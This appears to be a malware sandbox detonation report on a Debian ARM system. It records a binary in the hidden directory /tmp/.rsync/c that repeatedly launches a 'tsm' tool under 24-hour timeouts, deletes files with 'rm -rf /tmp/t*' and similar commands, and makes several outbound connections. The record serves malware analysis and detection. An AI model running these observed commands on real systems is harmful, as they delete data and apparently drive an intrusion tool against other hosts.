[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 505 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.19:443 tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-28 12:54

Reported

2024-06-28 12:58

Platform

debian9-armhf-20240418-en

Max time kernel

148s

Command Line

[/tmp/.rsync/c/go]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A
File opened for modification /tmp/.rsync/c/v /usr/bin/touch N/A

Processes

/tmp/.rsync/c/go

[/tmp/.rsync/c/go]

/bin/uname

[uname -m]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

[timeout 24h ./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/tmp/.rsync/c/tsm

[./tsm -t 75 -f 1 -s 12 -S 8 -p 0 -d 1 p ip]

/bin/sleep

[sleep 3]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf .out]

/bin/rm

[rm -rf /tmp/t*]

/usr/bin/touch

[touch v]

/bin/rm

[rm -rf p]

/bin/rm

[rm -rf ip]

/bin/rm

[rm -rf xtr*]

/bin/rm

[rm -rf a a.*]

/bin/rm

[rm -rf b b.*]

/usr/bin/timeout

